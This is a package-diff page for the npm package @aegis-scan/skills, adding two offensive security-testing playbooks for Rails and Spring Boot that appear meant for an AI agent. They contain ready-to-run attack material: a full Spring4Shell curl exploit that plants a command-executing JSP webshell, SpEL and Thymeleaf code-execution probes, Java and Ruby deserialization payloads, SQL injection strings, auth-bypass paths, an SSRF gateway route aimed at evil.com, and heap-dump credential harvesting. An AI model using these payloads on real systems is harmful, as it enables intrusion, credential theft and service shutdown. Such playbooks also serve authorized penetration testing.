npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.2 - Mend

@aegis-scan/skills 0.5.0 → 0.5.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (345) hide show

package/skills/offensive/airecon-fork/frameworks-rails/SKILL.md ADDED Viewed

@@ -0,0 +1,269 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: rails
+description: Security testing playbook for Ruby on Rails applications covering mass assignment, CSRF, route enumeration, deserialization, and Rails-specific misconfigurations
+---
+# Ruby on Rails Security Testing
+Rails is common in startups and SaaS applications. Key attack surface: mass assignment via strong parameters bypass, CSRF handling, route enumeration, Ruby deserialization, and config exposure.
+---
+## Reconnaissance
+### Fingerprinting Rails
+    # Rails-specific paths and patterns
+    GET /rails/info/properties          # Rails app info (development only)
+    GET /rails/info/routes              # Full route listing (development only)
+    GET /rails/mailers                  # Mailer preview (development only)
+    GET /sidekiq                        # Sidekiq job queue (very common)
+    GET /sidekiq/queues                 # Queue list
+    GET /resque                         # Resque dashboard
+    GET /delayed_job                    # DelayedJob dashboard
+    # Rails standard routes
+    GET  /                              # Root
+    GET  /users                         # Index
+    GET  /users/new                     # New form
+    POST /users                         # Create
+    GET  /users/:id                     # Show
+    GET  /users/:id/edit                # Edit form
+    PATCH/PUT /users/:id                # Update
+    DELETE /users/:id                   # Delete
+    # Rails JSON API conventions
+    GET /api/v1/<resource>.json
+    GET /api/v1/<resource>/<id>.json
+    # Fingerprinting via headers
+    X-Request-Id: <uuid>                # Rails generates this
+    Set-Cookie: _app_session=...        # Rails session cookie pattern
+    # Error page fingerprint
+    GET /nonexistent → ActionController::RoutingError (development)
+---
+## Route Enumeration
+    # rails routes exposed in development
+    GET /rails/info/routes
+    # Production route guessing from RESTful conventions
+    # GET  /admin            → admin dashboard
+    # GET  /admin/users      → user management
+    # GET  /health           → health check
+    # GET  /__health         → alt health
+    # GET  /metrics          → Prometheus metrics (sometimes)
+    # Fuzz with Rails-specific wordlist
+    dirsearch -u <target> -w /usr/share/seclists/Discovery/Web-Content/rails.txt
+---
+## Mass Assignment
+Rails 4+ uses Strong Parameters — but bypass is common via nested params or whitelisted `:all`:
+    # Test by adding extra fields to any POST/PUT/PATCH:
+    POST /users
+    {"user": {"email": "a@b.com", "password": "pass", "admin": true, "role": "admin"}}
+    # Nested attributes bypass:
+    POST /profiles
+    {"profile": {"bio": "test", "user_attributes": {"admin": true}}}
+    # permit! wildcard (vulnerable):
+    params.require(:user).permit!    # Allows all attributes
+    # rails_admin and ActiveAdmin gems often have mass assignment issues
+    POST /admin/users
+    {"user": {"admin": true, "role_id": 1}}
+---
+## CSRF
+    # Rails CSRF: authenticity_token in forms + X-CSRF-Token header
+    # Default: protects all non-GET/HEAD/OPTIONS/TRACE requests
+    # Bypass techniques:
+    # 1. API controllers with protect_from_forgery :with => :null_session (CSRF disabled)
+    # 2. Routes under /api/ commonly skip CSRF
+    # 3. Same-site cookie with XSS
+    # 4. JSON-only endpoints sometimes exempt (Content-Type: application/json)
+    # 5. Token in URL (?authenticity_token=...) — leaked in Referer header
+    # Extract CSRF token
+    curl -c cookies.txt -s <target>/login | grep authenticity_token
+---
+## Ruby Deserialization
+Rails uses Marshal for Ruby object serialization in cookies (Rails < 4.0 default) and some caches:
+    # Marshal-based cookie deserialization (old Rails):
+    # If cookie contains %-encoded binary data starting with BAh = Marshal.dump
+    echo "BAh..." | base64 -d | ruby -e "require 'marshal'; puts Marshal.load(STDIN.read)"
+    # Generate deserialization payload (Ruby gadget chains):
+    # Tool: https://github.com/presidentbeef/brakeman
+    # Universal gadget via erb:
+    ruby -e "require 'erb'; require 'open3'; payload = ERB.new('<%= \`id\` %>'); puts Marshal.dump(payload)"
+    # Rails cookie secret key base exposure → forge cookies
+    # If SECRET_KEY_BASE or SECRET_TOKEN is in git history, .env, or leaked error page:
+    # Forge any session data
+    # CVE-2013-0156: Old Rails YAML/XML deserialization
+    # CVE-2020-8163: Remote code execution in Rails < 5.2.4.3 (ERB render injection)
+---
+## SQL Injection
+    # ActiveRecord is parameterized by default, but raw queries exist:
+    # Vulnerable patterns:
+    User.where("name = '#{params[:name]}'")                       # Vulnerable
+    User.find_by_sql("SELECT * FROM users WHERE id=#{params[:id]}")  # Vulnerable
+    User.order(params[:sort])                                      # Order injection
+    # Safe patterns:
+    User.where("name = ?", params[:name])                          # Safe
+    User.where(name: params[:name])                                # Safe
+    # Order-by injection (extremely common in Rails apps):
+    GET /users?sort=name ASC,(SELECT SLEEP(5))--
+    GET /products?order=price`,(SELECT 1 FROM (SELECT SLEEP(5))a)--
+    # Test with sqlmap:
+    sqlmap -u "<target>/users?sort=name" --dbms=postgresql -p sort --level=3
+---
+## File Upload (Active Storage / CarrierWave / Paperclip)
+    # Rails Active Storage endpoints:
+    GET /rails/active_storage/blobs/<token>/<filename>
+    GET /rails/active_storage/representations/<...>
+    GET /rails/active_storage/disk/<...>
+    # Direct upload endpoint (may allow arbitrary file types):
+    POST /rails/active_storage/direct_uploads
+    Content-Type: application/json
+    {"blob": {"filename": "shell.rb", "content_type": "image/jpeg", "byte_size": 100}}
+    # CarrierWave: check if serve_static_assets or X-Accel-Redirect used
+    # Path traversal in filename: ../../../config/database.yml
+---
+## Sensitive File Exposure
+    # Rails configuration files
+    GET /config/database.yml            # DB credentials
+    GET /config/secrets.yml             # Secret key base (Rails 4.2)
+    GET /config/credentials.yml.enc     # Encrypted credentials (Rails 5.2+)
+    GET /config/master.key              # Decrypts credentials.yml.enc (CRITICAL)
+    GET /config/environments/production.rb
+    # Log files
+    GET /log/production.log
+    # Gemfile reveals gems in use
+    GET /Gemfile
+    GET /Gemfile.lock
+    # .env exposure
+    GET /.env
+    # Git exposure (common in Heroku/Render deployments)
+    GET /.git/config
+---
+## Sidekiq Dashboard
+    # Sidekiq web UI (very commonly exposed without auth)
+    GET /sidekiq
+    GET /sidekiq/queues
+    GET /sidekiq/workers
+    GET /sidekiq/retries
+    GET /sidekiq/dead
+    # If accessible: view job arguments (may contain credentials, user data)
+    # Can retry/delete jobs
+    # Sidekiq API:
+    GET /sidekiq/api/queues
+    GET /sidekiq/api/stats
+---
+## Authentication
+    # Devise (most common Rails auth gem) endpoints:
+    POST /users/sign_in
+    POST /users/sign_up
+    DELETE /users/sign_out
+    POST /users/password                 # Password reset request
+    PUT  /users/password                 # Password reset with token
+    GET  /users/confirmation?token=...   # Email confirmation
+    # Devise account enumeration:
+    POST /users/password
+    {"user": {"email": "valid@example.com"}}    # "You will receive an email"
+    {"user": {"email": "invalid@example.com"}}  # "Email not found"
+    # Devise token authentication (devise_token_auth):
+    POST /auth/sign_in  → returns uid, access-token, client, token-type
+    # Replay attack: token is single-use but race condition may allow reuse
+---
+## IDOR
+    # Rails RESTful routes use sequential integer IDs by default
+    GET /invoices/1
+    GET /invoices/2     # Another user's invoice?
+    # Nested resources:
+    GET /users/1/documents/1    # Verify /users/:user_id matches authenticated user
+    # Globalize (multi-language): check if lang param causes different auth path
+    GET /en/admin
+    GET /ja/admin
+---
+## View Injection / XSS
+    # Rails auto-escapes ERB by default
+    # raw() and html_safe bypass escape:
+    <%= raw(params[:name]) %>       # XSS if user-controlled
+    # JSON injection in view:
+    <%= params[:callback].html_safe %>    # JSONP injection
+    # Redirect injection:
+    redirect_to params[:return_to]   # Open redirect if not validated
+---
+## Pro Tips
+1. `/sidekiq` without auth is extremely common — always check it first
+2. `/rails/info/routes` in development exposes full route list
+3. `SECRET_KEY_BASE` in git history → forge any session cookie
+4. Order-by injection (`?sort=`, `?order=`) is the most common Rails SQLi pattern
+5. Devise password reset: test token brute-force and timing attacks
+6. `permit!` in strong parameters is a mass assignment goldmine
+7. Active Storage direct upload may accept dangerous file types
+## Summary
+Rails testing = Sidekiq exposure + route enumeration + mass assignment in strong params + order-by SQLi injection. The fastest critical find is Sidekiq dashboard exposed without auth (common) or SECRET_KEY_BASE in git history enabling session forgery. Always test Devise endpoints for account enumeration and timing attacks.

package/skills/offensive/airecon-fork/frameworks-spring/SKILL.md ADDED Viewed

@@ -0,0 +1,245 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: spring
+description: Security testing playbook for Spring Boot/MVC applications covering Actuator endpoints, SSTI via Thymeleaf, Spring4Shell, EL injection, and Java deserialization
+---
+# Spring Boot / Spring MVC Security Testing
+Spring is the dominant Java enterprise framework. Critical attack surface: exposed Actuator endpoints, EL/SSTI injection, Spring4Shell (CVE-2022-22965), deserialization, and Spring Security misconfigurations.
+---
+## Reconnaissance
+### Fingerprinting Spring
+    # Spring Boot Actuator — management endpoints (HIGHEST PRIORITY)
+    GET /actuator                       # Lists all enabled actuator endpoints
+    GET /actuator/health                # App health (often public)
+    GET /actuator/env                   # Environment variables + config (CRITICAL)
+    GET /actuator/beans                 # All Spring beans
+    GET /actuator/mappings              # All URL mappings (full route enumeration!)
+    GET /actuator/loggers               # Log level config
+    GET /actuator/metrics               # Application metrics
+    GET /actuator/threaddump            # Thread dump
+    GET /actuator/heapdump              # JVM heap dump (download full memory!)
+    GET /actuator/httptrace             # Recent HTTP requests
+    GET /actuator/sessions              # Active sessions
+    GET /actuator/shutdown              # POST → shuts down app (if enabled!)
+    # Legacy Spring Boot 1.x paths (pre-2.0)
+    GET /health
+    GET /env
+    GET /mappings
+    GET /beans
+    GET /trace
+    GET /dump
+    # Alternate Actuator base paths
+    GET /management/actuator
+    GET /admin/actuator
+    GET /api/actuator
+    GET /internal/actuator
+    # Error pages reveal Spring
+    GET /nonexistent → Whitelabel Error Page → confirms Spring Boot
+    X-Application-Context header in responses
+---
+## Actuator Exploitation
+### /actuator/env — Credential Extraction
+    # Returns all properties including masked values (shown as ***)
+    # Unmasked properties visible directly
+    # Change log level to TRACE → verbose credential logging
+    POST /actuator/loggers/org.springframework.web
+    Content-Type: application/json
+    {"configuredLevel": "TRACE"}
+    # Actuator env with POST can set properties:
+    POST /actuator/env
+    Content-Type: application/json
+    {"name": "spring.datasource.url", "value": "jdbc:h2:mem:testdb"}
+### /actuator/heapdump — Memory Extraction
+    # Download full JVM heap (can be hundreds of MB)
+    curl -o heap.hprof http://<target>/actuator/heapdump
+    # Analyze with Eclipse Memory Analyzer (MAT) or strings
+    strings heap.hprof | grep -iE "password|secret|key|token|jdbc"
+### /actuator/mappings — Route Discovery
+    # Full list of all URL mappings, methods, and handlers
+    curl -s <target>/actuator/mappings | python3 -m json.tool | grep '"pattern"'
+### /actuator/shutdown — DoS (if POST enabled)
+    POST /actuator/shutdown
+    Content-Type: application/json
+    {}
+---
+## Spring4Shell (CVE-2022-22965) — RCE
+Affects Spring MVC 5.3.x < 5.3.18, 5.2.x < 5.2.20, JDK 9+, packaged as WAR on Tomcat:
+    # Exploit — write JSP webshell via ClassLoader
+    curl -X POST <target>/any-spring-mvc-endpoint \
+      --data "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((-1!%3D(a%3Din.read(b))))%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" \
+      -H "c1: Runtime" -H "c2: <%"  -H "suffix: %>"
+    # After exploit, access the webshell:
+    GET /tomcatwar.jsp?pwd=j&cmd=id
+    # Nuclei template:
+    nuclei -t cves/2022/CVE-2022-22965.yaml -u <target>
+---
+## Thymeleaf SSTI (Spring View Manipulation)
+Thymeleaf is the default template engine for Spring Boot:
+    # If user input ends up in view name (Spring MVC controller returns view name from input):
+    # Vulnerable pattern:
+    # @GetMapping("/path") public String index(@RequestParam String lang) { return lang; }
+    # Basic probes:
+    /__$%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27id%27%29%7D__::
+    __${T(java.lang.Runtime).getRuntime().exec('id')}__::
+    # Spring EL expression via Thymeleaf
+    ${T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','id'})}
+    # If fragment is injectable:
+    GET /path?fragment=__${T(java.lang.Runtime).getRuntime().exec('id')}__::
+---
+## Spring EL Injection
+    # SpEL injection in @Value annotations, Spring Security expressions, or dynamic evaluation
+    # Test any input that may be evaluated as SpEL:
+    T(java.lang.Runtime).getRuntime().exec('id')
+    new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).next()
+    # HTTP parameter to SpEL (if app uses BeanFactory.getBean(userInput)):
+    ?expression=T(java.lang.Runtime).getRuntime().exec('id')
+---
+## Java Deserialization
+    # Spring apps using Java serialization (RMI, JMX, ObjectInputStream)
+    # Detect: Content-Type: application/x-java-serialized-object
+    # Or: base64 starting with rO0AB (Java serialized object magic bytes)
+    # Test all binary-accepting endpoints
+    # Generate payload with ysoserial:
+    java -jar ysoserial.jar CommonsCollections1 'id' > payload.ser
+    curl -X POST <target>/endpoint \
+      -H "Content-Type: application/x-java-serialized-object" \
+      --data-binary @payload.ser
+    # Common gadget chains for Spring ecosystem:
+    CommonsCollections1/3/5/6 (Apache Commons Collections)
+    Spring1/Spring2 (Spring itself)
+    Groovy1 (if Groovy on classpath)
+---
+## Spring Security Misconfigurations
+    # permitAll() on sensitive endpoints:
+    GET /api/admin/users    # Should require auth
+    GET /api/internal/      # Often left open
+    # CSRF disabled for API (common but dangerous if cookies used):
+    # http.csrf().disable() in SecurityConfig
+    # URL matching bypasses (Spring Security path matching):
+    GET /admin%2F           # URL-encoded slash bypass
+    GET /admin;ignored/     # Semicolon matrix parameter bypass (older Spring)
+    GET /admin/./           # Path traversal normalization bypass
+    GET //admin/            # Double slash bypass
+    # Method-level security check:
+    # @PreAuthorize("hasRole('ADMIN')") — test with USER role
+---
+## OAuth2 / JWT
+    # Spring Security OAuth2 endpoints:
+    GET /oauth/authorize
+    POST /oauth/token
+    GET /oauth/check_token
+    GET /.well-known/openid-configuration
+    # JWT with RS256: algorithm confusion → sign with public key as HS256
+    # JWT 'kid' header injection for key confusion
+    # Missing audience/issuer validation
+---
+## Actuator via Spring Cloud
+    # Spring Cloud Config Server — very high value
+    GET /env/<app-name>/<profile>/<branch>   # Remote config fetch
+    GET /<app-name>/default                  # Default profile config
+    # Spring Cloud Gateway SSRF (CVE-2022-22947)
+    POST /actuator/gateway/routes/ssrf-test
+    Content-Type: application/json
+    {
+      "id": "ssrf-test",
+      "filters": [{"name": "AddResponseHeader", "args": {"name": "foo", "value": "#{T(java.lang.Runtime).getRuntime().exec('id').text}"}}],
+      "uri": "https://evil.com"
+    }
+---
+## Common CVEs
+| CVE | Component | Impact |
+|-----|-----------|--------|
+| CVE-2022-22965 | Spring MVC | RCE (Spring4Shell) |
+| CVE-2022-22963 | Spring Cloud Function | RCE via SpEL |
+| CVE-2022-22947 | Spring Cloud Gateway | RCE via Actuator |
+| CVE-2021-22096 | Spring Framework | Log injection |
+| CVE-2020-5421 | Spring MVC | Reflected File Download |
+    # Scan for known CVEs:
+    nuclei -t cves/ -u <target> -tags spring
+---
+## Key Tools
+    nuclei -t exposures/configs/spring-actuator.yaml -u <target>
+    nuclei -t cves/ -tags spring -u <target>
+    dirsearch -u <target> -e java,class,war,xml
+---
+## Pro Tips
+1. `/actuator/mappings` = free full route enumeration — always check first
+2. `/actuator/heapdump` = full JVM memory — contains plaintext credentials, tokens, secrets
+3. `/actuator/env` masks passwords but often other sensitive properties are visible
+4. Spring4Shell (CVE-2022-22965) requires WAR deployment on Tomcat — check server type
+5. Whitelabel Error Page confirms Spring Boot; custom error pages may hide it
+6. CSRF is commonly disabled for REST APIs — test all state-changing API calls
+7. SpEL injection is rare but critical — search for dynamic expression evaluation
+## Summary
+Spring testing = Actuator endpoints (env, heapdump, mappings) + Spring4Shell check + Thymeleaf SSTI + Spring Security URL bypass. Actuator exposure is the #1 finding in Spring apps — heapdump alone can reveal all secrets in memory. Always enumerate alternate Actuator base paths (/management/, /admin/, /internal/).